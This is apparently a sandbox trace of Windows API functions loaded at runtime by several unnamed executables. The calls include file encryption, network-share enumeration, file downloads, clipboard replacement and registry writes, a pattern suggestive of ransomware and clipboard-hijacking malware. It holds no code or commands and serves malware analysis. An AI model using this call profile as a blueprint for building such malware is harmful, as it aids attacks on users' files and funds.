DynamicLoader: kernel32.dll/GetModuleHandleExW
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/IsValidCodePage
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/GetOEMCP
DynamicLoader: kernel32.dll/GetCPInfo
DynamicLoader: kernel32.dll/GetCurrentThreadId
DynamicLoader: kernel32.dll/WriteConsoleW
DynamicLoader: USER32.dll/SystemParametersInfoW
DynamicLoader: USER32.dll/ReleaseDC
DynamicLoader: USER32.dll/GetDC
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: USER32.dll/wsprintfW
DynamicLoader: USER32.dll/CreateWindowStationW
DynamicLoader: USER32.dll/SetProcessWindowStation
DynamicLoader: USER32.dll/DrawTextA
DynamicLoader: USER32.dll/DrawTextW
DynamicLoader: USER32.dll/FillRect
DynamicLoader: USER32.dll/GetForegroundWindow
DynamicLoader: GDI32.dll/SetTextColor
DynamicLoader: GDI32.dll/DeleteDC
DynamicLoader: GDI32.dll/GetDeviceCaps
DynamicLoader: GDI32.dll/GetDIBits
DynamicLoader: GDI32.dll/SetBkColor
DynamicLoader: GDI32.dll/SetPixel
DynamicLoader: GDI32.dll/DeleteObject
DynamicLoader: GDI32.dll/SelectObject
DynamicLoader: GDI32.dll/CreateCompatibleDC
DynamicLoader: GDI32.dll/CreateCompatibleBitmap
DynamicLoader: GDI32.dll/CreateFontW
DynamicLoader: GDI32.dll/GetObjectW
DynamicLoader: GDI32.dll/GetPixel
DynamicLoader: GDI32.dll/GetStockObject
DynamicLoader: GDI32.dll/SetBitmapBits
DynamicLoader: GDI32.dll/CreateBitmap
DynamicLoader: GDI32.dll/GetBitmapBits
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount
DynamicLoader: ADVAPI32.dll/GetSidSubAuthority
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptEncrypt
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptAcquireContextW
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: SHELL32.dll/ShellExecuteExW
DynamicLoader: SHELL32.dll/SHGetSpecialFolderPathW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: MPR.dll/WNetEnumResourceW
DynamicLoader: MPR.dll/WNetCloseEnum
DynamicLoader: MPR.dll/WNetOpenEnumW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/HttpOpenRequestW
DynamicLoader: WININET.dll/HttpSendRequestW
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetConnectW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: 3751939260.exe/atexit
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: ntdll.dll/RtlComputeCrc32
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptGenKey
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptGetKeyParam
DynamicLoader: CRYPTSP.dll/CryptEncrypt
DynamicLoader: ntdll.dll/RtlComputeCrc32
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: drprov.dll/NPGetCaps
DynamicLoader: drprov.dll/NPGetUser
DynamicLoader: drprov.dll/NPAddConnection
DynamicLoader: drprov.dll/NPAddConnection3
DynamicLoader: drprov.dll/NPGetReconnectFlags
DynamicLoader: drprov.dll/NPCancelConnection
DynamicLoader: drprov.dll/NPGetConnection
DynamicLoader: drprov.dll/NPGetConnection3
DynamicLoader: drprov.dll/NPGetUniversalName
DynamicLoader: drprov.dll/NPOpenEnum
DynamicLoader: drprov.dll/NPEnumResource
DynamicLoader: drprov.dll/NPCloseEnum
DynamicLoader: drprov.dll/NPGetResourceParent
DynamicLoader: drprov.dll/NPGetResourceInformation
DynamicLoader: ntlanman.dll/NPGetCaps
DynamicLoader: ntlanman.dll/NPGetUser
DynamicLoader: ntlanman.dll/NPAddConnection
DynamicLoader: ntlanman.dll/NPAddConnection3
DynamicLoader: ntlanman.dll/NPGetReconnectFlags
DynamicLoader: ntlanman.dll/NPCancelConnection
DynamicLoader: ntlanman.dll/NPGetConnection
DynamicLoader: ntlanman.dll/NPGetConnection3
DynamicLoader: ntlanman.dll/NPGetUniversalName
DynamicLoader: ntlanman.dll/NPGetConnectionPerformance
DynamicLoader: ntlanman.dll/NPOpenEnum
DynamicLoader: ntlanman.dll/NPEnumResource
DynamicLoader: ntlanman.dll/NPCloseEnum
DynamicLoader: ntlanman.dll/NPFormatNetworkName
DynamicLoader: ntlanman.dll/NPGetResourceParent
DynamicLoader: ntlanman.dll/NPGetResourceInformation
DynamicLoader: davclnt.dll/NPGetCaps
DynamicLoader: davclnt.dll/NPGetUser
DynamicLoader: davclnt.dll/NPAddConnection
DynamicLoader: davclnt.dll/NPAddConnection3
DynamicLoader: davclnt.dll/NPGetReconnectFlags
DynamicLoader: davclnt.dll/NPCancelConnection
DynamicLoader: davclnt.dll/NPGetConnection
DynamicLoader: davclnt.dll/NPGetConnection3
DynamicLoader: davclnt.dll/NPGetUniversalName
DynamicLoader: davclnt.dll/NPOpenEnum
DynamicLoader: davclnt.dll/NPEnumResource
DynamicLoader: davclnt.dll/NPCloseEnum
DynamicLoader: davclnt.dll/NPFormatNetworkName
DynamicLoader: davclnt.dll/NPGetResourceParent
DynamicLoader: davclnt.dll/NPGetResourceInformation
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: ADVAPI32.dll/CreateWellKnownSid
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: wkscli.dll/NetWkstaGetInfo
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: browcli.dll/NetServerEnum
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: netutils.dll/NetApiBufferAllocate
DynamicLoader: ntdll.dll/NtSetInformationFile
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: MPR.dll/WNetSetLastErrorW
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/I_RpcExceptionFilter
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 1495120250.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 2080821079.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 1674519319.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 3876917383.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
